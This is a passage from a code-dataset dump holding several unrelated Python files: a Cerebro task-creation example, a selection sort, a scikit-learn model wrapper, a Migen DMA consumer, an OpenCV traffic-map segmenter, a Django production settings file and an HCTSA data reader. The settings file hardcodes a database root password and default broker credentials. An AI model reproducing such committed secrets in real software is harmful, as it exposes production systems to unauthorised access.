create_tasks\n\n\t\tcreate_tasks.create_and_link_tasks('user', 'password')\n\t::\n\t\"\"\"\n\t\n\tdef find(f, seq):\n\t\t# поиск объектов в списке\n\t\tfor item in seq:\n\t\t\tif f(item): \n\t\t\t\treturn item\n\n\ttry:\n\n\t\tdb = database.Database()\n\t\t# Устанавливаем соединение с базой данных\n\t\tif db.connect_from_cerebro_client() != 0: # пробуем установить соединение с помощью запущенного клиента Cerebro. \n\t\t\t# Если не выходит, устанавливаем с помощью логина и пароля\n\t\t\tdb.connect(db_user, db_password) \n\t\t\n\t\troot_tasks = db.root_tasks() # Получаем список корневых задач проектов.\n\t\t\n\t\t# Ищем нужную корневую задачу проекта в который и будем добовлять задачи\n\t\troot_task = find(lambda val: val[dbtypes.TASK_DATA_NAME] == project_name, root_tasks)\n\t\t\n\t\t# Создаем задачу в проекте\n\t\tnew_task_id = db.add_task(root_task[dbtypes.TASK_DATA_ID], 'New Test Task')\n\t\t\"\"\"\n\t\tФункция add_task принимает на вход два агрумента:\n\t\t- идентификатор родительской задачи, в данном случаи идентификатор корневой задачи проекта \n\t\t- имя задачи, Будте внимательны имя задачи имеет ограничения. \n\t\tПодробнее о них смотрите в описании функции add_task.\n\t\t\n\t\tРезультат функции - идентификатор новой задачи.\n\t\t\"\"\"\t\t\n\t\t\n\t\t# Устанавливаем время начала задачи в теушее время\n\t\t\"\"\"\n\t\tВремя начала задачи устанавливается в днях от 01.01.2000 в UTC\n\t\tПодробнее о этом смотрите в описании функции task_set_start.\n\t\t\"\"\"\n\t\t\n\t\tdatetime_now = datetime.datetime.utcnow()\n\t\tdatetime_2000 = datetime.datetime(2000, 1, 1)\n\t\ttimedelta = datetime_now - datetime_2000\n\t\tdays = timedelta.total_seconds()/(24*60*60)\n\t\t\n\t\tdb.task_set_start(new_task_id, days)\n\t\t\n\t\t# Создаем две подзадачи к новой задаче\n\t\tnew_subtask_id_1 = db.add_task(new_task_id, 'New Test Subtask 1')\n\t\tnew_subtask_id_2 = db.add_task(new_task_id, 'New Test Subtask 2')\n\t\t\n\t\t# Добовляем к подзадачам постановки задач с файлами\n\t\tdef_id_1 = db.add_definition(new_subtask_id_1, 'Do something 1')\n\t\tdef_id_2 = db.add_definition(new_subtask_id_2, 'Do something 2')\n\n\t\t# Во второй подзадаче создадим еще 5 задач.\n\t\t# Для удобства просто создадим 5 копий подзадачи 1\n\t\tlst_for_copy = [(new_subtask_id_1, 'Subtask 1'), \n\t\t\t(new_subtask_id_1, 'Subtask 2'),\n\t\t\t(new_subtask_id_1, 'Subtask 3'),\n\t\t\t(new_subtask_id_1, 'Subtask 4'),\n\t\t\t(new_subtask_id_1, 'Subtask 5'),] # Создадим массив типа [(ID_копируемой задачи, 'Новое имя'), ...]\n\t\tnew_tasks = db.copy_tasks(new_subtask_id_2, lst_for_copy) # Копируем в подзадачу 2\n\t\t\n\t\tfilename1 = local_dir + '/test.png' # файл для первой подзадачи\n\t\tthumbnails1 = make_thumnails(filename1) # генерация эскизов для файла filename1\n\t\tfilename2 = local_dir + '/test.mp4' # файл для второй подзадачи\n\t\tthumbnails2 = make_thumnails(filename2) # генерация эскизов файла filename2\n\t\t\n\t\t# Создаем объект для добавления файлов в файловое хранилище (Cargador)\n\t\tcarga = cargador.Cargador(cargador_host, cargador_xmlrpc_port, cargador_http_port)\n\t\t\n\t\t# Добовляем к сообщениям типа постановки задач файлы и, заодно, экспортируем их в хранилище\n\t\tdb.add_attachment(def_id_1, carga, filename1, thumbnails1, '', False)\t\t\n\t\tdb.add_attachment(def_id_2, carga, filename2, thumbnails2, '', False)\n\t\t\"\"\"\n\t\t\tПараметр carga, передается для экспортирования файла в файловое хранилише.\n\t\t\tПодробнее об этом смотрите в модуле cargador.\n\t\t\t\n\t\t\tПоследний параметр означает, будет ли файл добавлен как линк, без экспорта в хранилище (значение True),\n\t\t\tили же он будет экспортитован (значение False)\n\t\t\tПодробнее об этом смотрите в описании функции add_attachment.\n\t\t\"\"\"\t\t\n\t\t\n\t\t# Удаляем сгенерированные эскизы, поскольку мы их уже экспортировали в хранилище\n\t\tfor f in thumbnails1:\n\t\t\tos.remove(f)\n\t\t\n\t\tfor f in thumbnails2:\n\t\t\tos.remove(f)\n\t\t\t\n\t\t\n\t\t# Устанавливаем запланированное время на подзадачи\n\t\tdb.task_set_planned_time(new_subtask_id_1, 12.5) # первой подзадаче устанавливаем 12 с половиной часов\n\t\tdb.task_set_planned_time(new_subtask_id_2, 30) # второй подзадаче устанавливаем 30 часов\n\t\t\n\t\t# Связываем подзадачи\n\t\tdb.set_link_tasks(new_subtask_id_1, new_subtask_id_2)\n\t\t\"\"\"\n\t\tЭта связь значит, что вторая подзадача начнется после окончания первой подзадачи\n\t\t\"\"\"\n\t\t\n\texcept Exception as err:\n\t\tprint(err)\n\n\ndef make_thumnails(filename):\n\t\"\"\"\n\tПриним��ет на вход полный путь до файла видео или изображения и генерирует эскизы к ним\n\t:returns: список путей до файлов эскизов.\t\n\n\tПример вызова функции:\n\t::\t\n\t\timport create_tasks\n\n\t\tfilename = 'c:/temp/file.mov'\n\t\tthumbnails = create_tasks.create_and_link_tasks(filename)\t\t\n\t::\n\t\n\tГенерация эскизов:\t\t\t\n\tЕсли файл является изображением или видео, то можно добавить для него уменшенные эскизы.\n\tМожно добавить до 3-х эскизов (первый, средний, последний кадры).\n\tДля генерации эскизов можно использовать программу Mirada.\n\tОна постовляется вместе с дистрибутивом Cerebro. Можно использовать и другие программы для генерации,\n\tнапример, ffmpeg.\n\t\"\"\"\n\t\n\t#Пример генерации эскизов с помощью Mirada.\t\n\n\tif os.path.exists(filename) == False or os.path.exists(mirada_path) == False:\n\t\treturn list()\n\t\n\tgen_path = os.path.dirname(filename) # В качестве директории для генерации эскизов возьмем директорию добавляемого файла\n\n\t# Запускаем мираду с необходимыми ключами\n\tres_code = subprocess.call([mirada_path, filename, '--temp', gen_path, '--hide', '--mode', 'thumbstandalone'])\t\t\t\t\n\t#-temp - директория для генерации эскизов\n\t#-hide - ключ запуска мирады в скрытом режиме (без загрузки графического интерфейса) для генерации табнейлов.\n\t\n\tif res_code != 0:\n\t\traise Exception(\"Mirada returned bad exit-status.\\n\" + mirada_path)\n\t\n\t#Ищем сгенерированные мирадой эскизы.\n\t#Имени эскиза формируется из имени файла, даты и времени генерации - filename_yyyymmdd_hhmmss_thumb[number].jpg\n\t#Например: test.mov_20120305_112354_thumb1.jpg - первый эскиз видео-файла test.mov\n\t\n\tthumbnails = list()\n\tfor f in os.listdir(gen_path):\n\t\tif fnmatch.fnmatch(f, os.path.basename(filename) + '.thumb*.jpg'):\n\t\t\tthumbnails.append(gen_path + '/' + f)\n\n\tthumbnails.sort()\t\n\t\n\t\"\"\"\n\t#Пример генерации эскизов с помощью ffmpeg.\n\t\n\t#Для того, чтобы генерить эскизы с помощью ffmpeg, нужно заранее знать длительность видео,\n\t#чтобы корректно получить средний и последний кадры.\n\t#Возьмем к примеру ролик длительностью в 30 секунд.\n\n\tthumbnails = list() # список файлов для эскизов\n\tthumbnails.append(filename + '_thumb1.jpg')\n\tthumbnails.append(filename + '_thumb2.jpg')\n\tthumbnails.append(filename + '_thumb3.jpg')\n\n\tsubprocess.call(['ffmpeg', '-i', filename, '-s', '512x512', '-an', '-ss', '00:00:00', '-r', 1, '-vframes', 1, '-y', thumbnails[0]])\n\tsubprocess.call(['ffmpeg', '-i', filename, '-s', '512x512', '-an', '-ss', '15:00:00', '-r', 1, '-vframes', 1, '-y', thumbnails[1]])\n\tsubprocess.call(['ffmpeg', '-i', filename, '-s', '512x512', '-an', '-ss', '30:00:00', '-r', 1, '-vframes', 1, '-y', thumbnails[2]])\n\t# Описание ключей вы можете посмотреть в документации к ffmpeg\n\t\"\"\"\n\t\n\treturn thumbnails\n","sub_path":"end-plugins/pycerebro/examples/create_tasks.py","file_name":"create_tasks.py","file_ext":"py","file_size_in_byte":14092,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"421988172","text":"import remove as rm\n# selection_sort의 베이스 형태.\n# def selection_sort(xs):\n# if xs != []:\n# smallest = min(xs)\n# xs.remove(smallest)\n# return [smallest]+selection_sort(xs)\n# else:\n# return []\n#######################################################\ndef selection_sort(xs):\n ss = []\n while xs != []:\n smallest = min(xs)\n rm.remove_proc(xs,smallest)\n ss.append(smallest)\n return ss\n\n#######################################################\ndef selection_sort_key(xs, key=(lambda x:x)): # key에 이 람다(향등함수)는 자기가 받은 인수를 그대로 돌려준다.\n ss = [] # xs, ss = xs, []\n while xs != []:\n smallest = min(xs,key=key)\n rm.remove_proc(xs,smallest) #xs.remove(smallest)\n ss.append(smallest)\n # xs, ss = xs, ss\n return ss\n","sub_path":"selection_sort.py","file_name":"selection_sort.py","file_ext":"py","file_size_in_byte":859,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"210153384","text":"import pickle\n\nimport pandas as pd\n\n\nclass IdentityTransform:\n \"\"\"Simple placeholder if no transformer is passed in.\"\"\"\n\n @staticmethod\n def transform(input_df):\n return input_df\n\n\nclass SimpleSklearnModel:\n \"\"\"Simple class to deserialize and run a sklearn model on json input.\"\"\"\n\n def __init__(\n self,\n path_to_serialized_model,\n output_columns,\n path_to_serialized_transformer=None,\n is_classifier=False,\n is_multiclass=False,\n ):\n self.path_to_serialized_model = path_to_serialized_model\n self.path_to_serialized_transformer = path_to_serialized_transformer\n self.output_columns = output_columns\n self.is_cls = is_classifier\n self.is_multi = is_multiclass\n with open(self.path_to_serialized_model, 'rb') as infile:\n self.model = pickle.load(infile)\n if self.path_to_serialized_transformer is not None:\n with open(self.path_to_serialized_transformer, 'rb') as infile:\n self.transformer = pickle.load(infile)\n else:\n self.transformer = IdentityTransform()\n\n def predict(self, input_df):\n if self.is_cls:\n if self.is_multi:\n predict_fn = self.model.predict_proba\n else:\n\n def predict_fn(x):\n return self.model.predict_proba(x)[:, 1]\n\n else:\n predict_fn = self.model.predict\n\n return pd.DataFrame(\n predict_fn(self.transformer.transform(input_df)),\n columns=self.output_columns,\n )\n\nprint('test')\n","sub_path":"wrapper.py","file_name":"wrapper.py","file_ext":"py","file_size_in_byte":1603,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"451984682","text":"from migen.fhdl.std import *\nfrom migen.flow.actor import Source, Sink\nfrom migen.fhdl.size import bits_for\nfrom migen.genlib.fsm import FSM, NextState\n\nfrom whacker.util import dmatpl\n\nfrom ulpi import ULPI_DATA\nD_LAST = [(\"d\", 8), (\"last\", 1)]\n\nfrom constants import *\n\n\ndef _inc(signal, modulo, dest_signal=None):\n if type(dest_signal) == type(None):\n dest_signal = signal\n\n assert modulo == 2**flen(signal)\n assert flen(dest_signal) == flen(signal)\n return dest_signal.eq(signal + 1)\n\nclass Consumer(Module):\n def __init__(self, port, depth):\n self.sink = Sink(dmatpl(depth))\n self.source = Source(D_LAST)\n self.busy = Signal()\n\n self.pos = Signal(max=depth, reset=0)\n self.pos_next = Signal(max=depth, reset=0)\n self.ct = Signal(max=depth, reset=0)\n self.ct_next = Signal(max=depth)\n\n\n self.comb += [\n self.ct_next.eq(self.ct),\n\n self.pos_next.eq(self.pos),\n port.adr.eq(self.pos_next),\n ]\n\n self.sync += [\n self.pos.eq(self.pos_next),\n self.ct.eq(self.ct_next)\n ]\n\n self.submodules.fsm = FSM()\n\n self.fsm.act(\"IDLE\",\n self.busy.eq(0),\n If(self.sink.stb,\n self.busy.eq(1),\n self.sink.ack.eq(1),\n self.pos_next.eq(self.sink.payload.start),\n self.ct_next.eq(self.sink.payload.count-1),\n NextState('d'),\n )\n )\n \n self.fsm.act(\"d\",\n self.busy.eq(1),\n self.source.stb.eq(1),\n self.source.payload.d.eq(port.dat_r),\n\n If(self.ct == 0,\n self.source.payload.last.eq(1)),\n\n If(self.source.ack,\n If(self.ct,\n _inc(self.pos, depth, self.pos_next),\n self.ct_next.eq(self.ct - 1),\n ).Else(\n NextState(\"IDLE\")\n )\n )\n )\n\n\n\nclass TestConsumer(Module):\n def __init__(self):\n from migen.actorlib.sim import SimActor, Dumper, Token\n\n class PORT(Module):\n def __init__(self, aw, dw):\n self.adr = Signal(aw)\n self.dat_r = Signal(dw)\n\n self.sync += self.dat_r.eq(self.adr)\n\n self.submodules.port = PORT(bits_for(1024), 8)\n\n def gen():\n yield Token('source', {\"start\": 0, \"count\" : 4})\n yield None\n yield Token('source', {\"start\": 555, \"count\" : 77})\n \n\n class SimSource(SimActor):\n def __init__(self):\n self.source = Source(dmatpl(1024))\n SimActor.__init__(self, gen())\n\n self.submodules.src = SimSource()\n self.submodules.c = Consumer(self.port, 1024)\n self.comb += self.c.sink.connect(self.src.source)\n self.comb += self.src.busy.eq(0)\n\n self.submodules.dmp = Dumper(D_LAST)\n self.comb += self.c.source.connect(self.dmp.result)\n self.comb += self.dmp.busy.eq(0)\n\n\n\nif __name__ == '__main__':\n from migen.sim.generic import Simulator, TopLevel\n tl = TopLevel(\"testcons.vcd\")\n test = TestConsumer()\n sim = Simulator(test, tl)\n sim.run(200)\n \n\n","sub_path":"software/fpga/ov3/whacker/consumer.py","file_name":"consumer.py","file_ext":"py","file_size_in_byte":3380,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"565249130","text":"import cv2\nimport numpy as np\nimport glob\nimport os\n\ndef maintain_aspect_ratio_resize(image, width=None, height=None, inter=cv2.INTER_AREA):\n dim = None\n (h, w) = image.shape[:2]\n if width is None and height is None:\n return image\n if width is None:\n r = height / float(h)\n dim = int(w * r), height\n else:\n r = width / float(w)\n dim = (width, int(h * r))\n return cv2.resize(image, dim, interpolation=inter)\ndef remove_object(immageToProcessPath):\n for filepath in glob.iglob(r'C:\\Users\\User\\PycharmProjects\\map_image_automation\\Icons\\*.png'):\n\n template = cv2.imread(filepath)\n template = cv2.cvtColor(template, cv2.COLOR_BGR2GRAY)\n template = cv2.Canny(template, 50, 200)\n (tH, tW) = template.shape[:2]\n # cv2.imshow(\"template\", template)\n\n original_image = cv2.imread(immageToProcessPath)\n final = original_image.copy()\n gray = cv2.cvtColor(original_image, cv2.COLOR_BGR2GRAY)\n found = None\n\n for scale in np.linspace(0.2, 1.0, 20)[::-1]:\n resized = maintain_aspect_ratio_resize(gray, width=int(gray.shape[1] * scale))\n r = gray.shape[1] / float(resized.shape[1])\n\n if resized.shape[0] < tH or resized.shape[1] < tW:\n break\n canny = cv2.Canny(resized, 50, 200)\n detected = cv2.matchTemplate(canny, template, cv2.TM_CCOEFF)\n (_, max_val, _, max_loc) = cv2.minMaxLoc(detected)\n\n if found is None or max_val > found[0]:\n found = (max_val, max_loc, r)\n\n (_, max_loc, r) = found\n (start_x, start_y) = (int(max_loc[0] * r), int(max_loc[1] * r))\n (end_x, end_y) = (int((max_loc[0] + tW) * r), int((max_loc[1] + tH) * r))\n\n cv2.rectangle(original_image, (start_x, start_y), (end_x, end_y), (0, 255, 0), 2)\n # cv2.imshow('detected', original_image)\n\n cv2.rectangle(final, (start_x, start_y), (end_x, end_y), (255, 255, 255), -1)\n #cv2.imshow('result', final)\n # cv2.waitKey(0)\n\n cv2.imwrite(immageToProcessPath, final)\ndef segment_image(imagePath):\n # img = \"mohakhali2.PNG\"\n print(imagePath)\n img = imagePath\n image = cv2.imread(str(img))\n\n mask = cv2.threshold(image, 210, 255, cv2.THRESH_BINARY)[1][:, :, 0]\n dst = cv2.inpaint(image, mask, 7, cv2.INPAINT_NS)\n\n hsv = cv2.cvtColor(image, cv2.COLOR_BGR2HSV)\n #cv2.imshow('masked', mask)\n #cv2.waitKey(0)\n ############ For Yellow Color ############\n\n lower_yellow = np.array([10, 160, 240])\n upper_yellow = np.array([80, 250, 255])\n\n mask = cv2.inRange(hsv, lower_yellow, upper_yellow)\n res_yellow = cv2.bitwise_and(image, image, mask=mask)\n #cv2.imwrite('yellow.png', res_yellow)\n\n ######### For Green Color##############\n # [ 51 127 174] [ 71 147 254]\n lower_blue = np.array([51, 127, 174])\n # upper_blue = np.array([145, 255, 255])\n upper_blue = np.array([71, 147, 254])\n mask = cv2.inRange(hsv, lower_blue, upper_blue)\n res_blue = cv2.bitwise_and(image, image, mask=mask)\n #cv2.imwrite('green.png', res_blue)\n\n ######### For Red Color ###########\n # [ 2 168 255] [ 22 188 255]\n # dark red [ 0 184 89] [ 0 204 169]\n # less dark red [ 0 192 255] [ 0 212 255]\n # lower_red = np.array([0, 184, 255])\n # upper_red = np.array([0, 204, 169])\n #\n # mask = cv2.inRange(hsv, lower_red, upper_red)\n\n # Range for lower red\n lower_red = np.array([0, 120, 70])\n upper_red = np.array([10, 255, 255])\n mask1 = cv2.inRange(hsv, lower_red, upper_red)\n\n # Range for upper range\n lower_red = np.array([170, 120, 70])\n upper_red = np.array([180, 255, 255])\n mask2 = cv2.inRange(hsv, lower_red, upper_red)\n\n # Generating the final mask to detect red color\n mask = mask1 + mask2\n\n res_red = cv2.bitwise_and(image, image, mask=mask)\n #cv2.imwrite('red.png', res_red)\n # cv2.imshow('red',cv2.imread('messi_red.png'))\n # cv2.waitKey(0)\n cv2.destroyAllWindows()\n height, width, channels = image.shape\n\n res = res_red + res_blue + res_yellow\n for i in range(0, height):\n for j in range(0, width):\n a, b, c = res_red[i, j]\n if (a > 0 or b > 0 or c > 0):\n a, b, c = res_blue[i, j]\n if (a > 0 or b > 0 or c > 0):\n a, b, c = res_blue[i, j]\n if (a > 0 or b > 0 or c > 0):\n res[i, j] = 0, 0, 0\n\n # res[:, 850:] = [0, 0, 0]\n # res[:, 0:640] = [0, 0, 0]\n # res[350:, :700] = [0, 0, 0]\n\n kernel = np.ones((20, 1), np.uint8) # note this is a horizontal kernel\n d_im = cv2.dilate(res, kernel, iterations=1)\n e_im = cv2.erode(d_im, kernel, iterations=1)\n\n imageName = imagePath.split('\\\\')[-1]\n area_name = imageName.split('_')[0]\n savepath = f'G:\\SPL3 Repo\\SoftwareProjectLab3_GG\\ImageToDataPreprocessing\\Test Dataset\\{area_name}\\Cleaned'\n cv2.imwrite(os.path.join(savepath, imageName), res)\ndef calcPercentage(msk):\n\t'''\n\treturns the percentage of white in a binary image\n\t'''\n\theight, width = msk.shape[:2]\n\tnum_pixels = height * width\n\tcount_white = cv2.countNonZero(msk)\n\tpercent_white = (count_white/num_pixels) * 100\n\tpercent_white = round(percent_white,2)\n\treturn percent_white\n\ndef image_to_text(imagePath):\n img = cv2.imread(imagePath)\n size = img.size\n hsv = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)\n lower_blue = np.array([51, 127, 174])\n upper_blue = np.array([71, 147, 254])\n mask = cv2.inRange(hsv, lower_blue, upper_blue)\n # cv2.imshow('test',mask)\n # cv2.waitKey()\n # print('green:' + str(calcPercentage(mask)))\n green_val = str(calcPercentage(mask))\n\n lower_yellow = np.array([10, 160, 240])\n upper_yellow = np.array([80, 250, 255])\n\n mask = cv2.inRange(hsv, lower_yellow, upper_yellow)\n #print('yellow/orange:' + str(calcPercentage(mask)))\n yellow_val = str(calcPercentage(mask))\n lower_red = np.array([0, 120, 70])\n upper_red = np.array([10, 255, 255])\n mask1 = cv2.inRange(hsv, lower_red, upper_red)\n\n # Range for upper range\n lower_red = np.array([170, 120, 70])\n upper_red = np.array([180, 255, 255])\n mask2 = cv2.inRange(hsv, lower_red, upper_red)\n\n # Generating the final mask to detect red color\n mask = mask1 + mask2\n # print('red:' + str(calcPercentage(mask)))\n red_val = str(calcPercentage(mask))\n image_name = imagePath.split('\\\\')[-1]\n area_name = image_name.split('_')[0]\n date = image_name.split('_')[1]\n day = image_name.split('_')[2]\n time = image_name.split('_')[3]+ ':' +image_name.split('_')[4]+ ':' +image_name.split('_')[5].split('.')[0]\n total_string = area_name + ',' + date + ',' + day + ','+ time + ','+ green_val+','+ yellow_val +',' + red_val\n savepath = f'G:\\SPL3 Repo\\SoftwareProjectLab3_GG\\ImageToDataPreprocessing\\Test Dataset'\n f = open(os.path.join(savepath, area_name+'.txt'), \"a+\")\n # f.write(total_string)\n # f.write('\\n')\n # print(total_string)\n\ndef main():\n #areas = ['Uttara','Farmgate','Dhanmondi','Karwan Bazar','Sadarghat','Kalabagan','Mirpur 1','Mirpur 10','Shahbagh', 'Kamalapur', 'Tejgaon','Mohammadpur','Katabon']\n areas = ['Tejgaon', 'Mohammadpur', 'Katabon']\n #areas = ['Mohakhali2']\n for areaName in areas:\n fileNo = 1\n folderPath = f'G:\\SPL3 Repo\\SoftwareProjectLab3_GG\\ImageToDataPreprocessing\\Test Dataset\\{areaName}\\*.png'\n for filepath in glob.iglob(folderPath):\n # print(filepath)\n print(f'working on image {fileNo}')\n remove_object(filepath)\n segment_image(filepath)\n cleaned_path = f'G:\\SPL3 Repo\\SoftwareProjectLab3_GG\\ImageToDataPreprocessing\\Test Dataset\\{areaName}\\Cleaned\\*.png'\n\n # for filepath in glob.iglob(cleaned_path):\n # image_to_text(filepath)\n # print(f'working on image {fileNo}')\nif __name__ == \"__main__\":\n main()","sub_path":"ImageToDataPreprocessing/Codes/ImageProcess.py","file_name":"ImageProcess.py","file_ext":"py","file_size_in_byte":7943,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"407591270","text":"DEBUG = True\n\nDATABASES = {\n \"default\": {\n # Ends with \"postgresql_psycopg2\", \"mysql\", \"sqlite3\" or \"oracle\".\n \"ENGINE\": \"django.db.backends.mysql\",\n # DB name or path to database file if using sqlite3.\n \"NAME\": \"pingjia\",\n # Not used with sqlite3.\n \"USER\": \"root\",\n # Not used with sqlite3.\n \"PASSWORD\": \"hY67UJMN\",\n # Set to empty string for localhost. Not used with sqlite3.\n \"HOST\": \"\",\n # Set to empty string for default. Not used with sqlite3.\n \"PORT\": \"\",\n }\n}\n\n# A sample logging configuration. The only tangible logging\n# performed by this configuration is to send an email to\n# the site admins on every HTTP 500 error when DEBUG=False.\n# See http://docs.djangoproject.com/en/dev/topics/logging for\n# more details on how to customize your logging configuration.\nLOGGING = {\n 'version': 1,\n 'disable_existing_loggers': False,\n 'filters': {\n 'require_debug_false': {\n '()': 'django.utils.log.RequireDebugFalse'\n }\n },\n 'handlers': {\n 'mail_admins': {\n 'level': 'ERROR',\n 'filters': ['require_debug_false'],\n 'class': 'django.utils.log.AdminEmailHandler'\n }\n },\n 'loggers': {\n 'django.request': {\n 'handlers': ['mail_admins'],\n 'level': 'ERROR',\n 'propagate': True,\n },\n }\n}\n\n# django-celery settings\nimport djcelery\ndjcelery.setup_loader()\n\nBROKER_HOST = \"localhost\"\nBROKER_PORT = 5672\nBROKER_BACKEND = \"django\"\n#BROKER_URL='django://'\nBROKER_USER = \"guest\"\nBROKER_PASSWORD = \"guest\"\nBROKER_VHOST = \"/\"\nCELERYBEAT_SCHEDULER = 'djcelery.schedulers.DatabaseScheduler'\n","sub_path":"pingjia/local_settings_prod.py","file_name":"local_settings_prod.py","file_ext":"py","file_size_in_byte":1706,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"38500958","text":"'''\r\nCreated on 8 Jun 2015\r\n\r\n@author: philip knaute\r\n------------------------------------------------------------------------------\r\nCopyright (C) 2015, Philip Knaute <philiphorst.project@gmail.com>,\r\n\r\nThis work is licensed under the Creative Commons\r\nAttribution-NonCommercial-ShareAlike 4.0 International License. To view a copy of\r\nthis license, visit http://creativecommons.org/licenses/by-nc-sa/4.0/ or send\r\na letter to Creative Commons, 444 Castro Street, Suite 900, Mountain View,\r\nCalifornia, 94041, USA.\r\n------------------------------------------------------------------------------\r\n'''\r\nimport csv\r\nimport scipy.io as sio\r\n\r\ndef read_calc_times(mat_file_path):\r\n \"\"\" Read the average calculation times for each operation from a HCTSA_loc.mat file\r\n Parameters:\r\n -----------\r\n mat_file_path : string\r\n Path to the HCTSA_loc.mat file\r\n Returns:\r\n --------\r\n op_ids_times_lst : list\r\n List of two lists. First being the operation ids and second the average times over all \r\n calculated timeseries for each respective operation.\r\n \"\"\" \r\n mat_file = sio.loadmat(mat_file_path)\r\n op_id = lambda i : int(mat_file['Operations'][i][0][3][0])\r\n \r\n calc_times = mat_file['TS_CalcTime'].sum(axis=0)/mat_file['TS_CalcTime'].shape[0]\r\n op_ids = [op_id(i) for i in range(mat_file['Operations'].shape[0])]\r\n return [op_ids,calc_times.tolist()]\r\n\r\ndef read_from_mat_file(inputDir,task_name,hctsa_struct_names,is_from_old_matlab = False):\r\n \"\"\"\r\n read .mat files into appropriate python data structures\r\n \r\n Parameters:\r\n ----------\r\n inputDir : string\r\n path to the directory where the mat/csv files are kept\r\n task_name : string\r\n the name of the classification task to be imported\r\n hctsa_struct_names : list\r\n List of strings of identifiers for which structures are to be read from the mat_file. \r\n Possible values are : 'TimeSeries','Operations','TS_DataMat'\r\n is_from_old_matlab : bool\r\n If the HCTSA_loc.mat files are saved from an older version of the comp engine. The order of entries is different.\r\n Returns:\r\n --------\r\n retval : tuple\r\n Tuple of the imported values in the order given by hctsa_struct_names\r\n \"\"\"\r\n\r\n LTv7_3 = False # lesser than mat v7.3\r\n # Input for true case not implemented yet\r\n \r\n\r\n # try:\r\n # mat_file = sio.loadmat(mat_file_path)\r\n # except NotImplementedError:\r\n # LTv7_3 = False\r\n # mat_file = h5py.File(mat_file_path,'r')\r\n # except:\r\n # ValueError('Could not read the file!')\r\n \r\n retval = tuple()\r\n for item in hctsa_struct_names:\r\n if item == 'TimeSeries':\r\n path_pattern = inputDir+'{:s}/hctsa_timeseries-info.csv'\r\n ts_info_path = path_pattern.format(task_name)\r\n timeseries = dict()\r\n if is_from_old_matlab:\r\n # lambda function used to populate the dictionary with the appropriate data lists\r\n ts_id = lambda i : int(ts_info['TimeSeries'][i][0][0][0]) #id\r\n ts_filename = lambda i : str(ts_info['TimeSeries'][i][0][1][0]) #name\r\n ts_kw = lambda i : str(ts_info['TimeSeries'][i][0][2][0]) #keyword\r\n ts_n_samples = lambda i : int(ts_info['TimeSeries'][i][0][3][0]) #length\r\n # data is not included in the returned dictionary as it seem a waste of space\r\n #ts_data = lambda i : mat_file['TimeSeries'][i][0][4]\r\n for extractor,key in zip([ts_id,ts_filename ,ts_kw,ts_n_samples],['id','filename','keywords','n_samples']):\r\n timeseries[key] =[extractor(i) for i in range(mat_file['TimeSeries'].shape[0])]\r\n elif not is_from_old_matlab and LTv7_3:\r\n # -- currently there seems to be a bug in the creation of those files. Need to\r\n # read them differently\r\n # lambda function used to populate the dictionary with the appropriate data lists\r\n #ts_id = lambda i : int(mat_file['TimeSeries'][i][0][0][0])\r\n\r\n # ----------- this is the original version, I (Carl) somehow need to switch the first two dimensions ----\r\n # ts_filename = lambda i : str(mat_file['TimeSeries'][0][i][0][0])\r\n # ts_kw = lambda i : str(mat_file['TimeSeries'][0][i][1][0])\r\n # ts_n_samples = lambda i : int(mat_file['TimeSeries'][0][i][2][0])\r\n # # -- data is not included in the returned dictionary as it seem a waste of space\r\n # #ts_data = lambda i : mat_file['TimeSeries'][i][0][3]\r\n # for extractor,key in zip([ts_filename ,ts_kw,ts_n_samples],['filename','keywords','n_samples']):\r\n # timeseries[key] =[extractor(i) for i in range(mat_file['TimeSeries'].shape[1])]\r\n\r\n # ------------ to this\r\n ts_filename = lambda i: str(mat_file['TimeSeries'][i][0][0][0])\r\n ts_kw = lambda i: str(mat_file['TimeSeries'][i][0][1][0])\r\n #ts_n_samples = lambda i: int(mat_file['TimeSeries'][i][0][2][0])\r\n # -- data is not included in the returned dictionary as it seem a waste of space\r\n # ts_data = lambda i : mat_file['TimeSeries'][i][0][3]\r\n for extractor, key in zip([ts_filename, ts_kw, ts_n_samples], ['filename', 'keywords', 'n_samples']):\r\n timeseries[key] = [extractor(i) for i in range(mat_file['TimeSeries'].shape[0])]\r\n else:\r\n import re\r\n with open(ts_info_path,'r') as f1:\r\n info_reader = csv.reader(f1)\r\n ts_info = list(info_reader)\r\n del ts_info[0]\r\n ts_filename = lambda i: str(ts_info[i][0])\r\n ts_kw = lambda i: re.sub(\"SHAM_|DREDD_|rsfMRI_|mouse\\d+\",'',str(ts_info[i][1].replace(',','_') ) )\r\n ts_n_samples = lambda i: int(ts_info[i][2])\r\n\r\n for extractor, key in zip([ts_filename, ts_kw, ts_n_samples], ['filename', 'keywords', 'n_samples']):\r\n timeseries[key] = [extractor(i) for i in range(len(ts_info))]\r\n retval = retval + (timeseries,)\r\n \r\n if item == 'Operations':\r\n path_pattern = inputDir+'{:s}/hctsa_features.csv'\r\n op_path = path_pattern.format(task_name)\r\n operations = dict()\r\n if is_from_old_matlab:\r\n op_id = lambda i : int(mat_file['Operations'][i][0][0][0])\r\n op_name = lambda i : str(mat_file['Operations'][i][0][1][0])\r\n op_kw = lambda i : str(mat_file['Operations'][i][0][2][0])\r\n op_code = lambda i : str(mat_file['Operations'][i][0][3][0])\r\n op_mopid = lambda i : int(mat_file['Operations'][i][0][4][0])\r\n for extractor,key in zip([op_id,op_name ,op_kw,op_code,op_mopid],['id','name','keywords','code_string','master_id']):\r\n operations[key] =[extractor(i) for i in range(mat_file['Operations'].shape[0])] \r\n elif not is_from_old_matlab and LTv7_3:\r\n # lambda function used to populate the dictionary with the appropriate data lists\r\n op_id = lambda i : int(mat_file['Operations'][i][0][3][0])\r\n op_name = lambda i : str(mat_file['Operations'][i][0][1][0])\r\n op_kw = lambda i : str(mat_file['Operations'][i][0][2][0])\r\n op_code = lambda i : str(mat_file['Operations'][i][0][0][0])\r\n op_mopid = lambda i : int(mat_file['Operations'][i][0][4][0])\r\n for extractor,key in zip([op_id,op_name 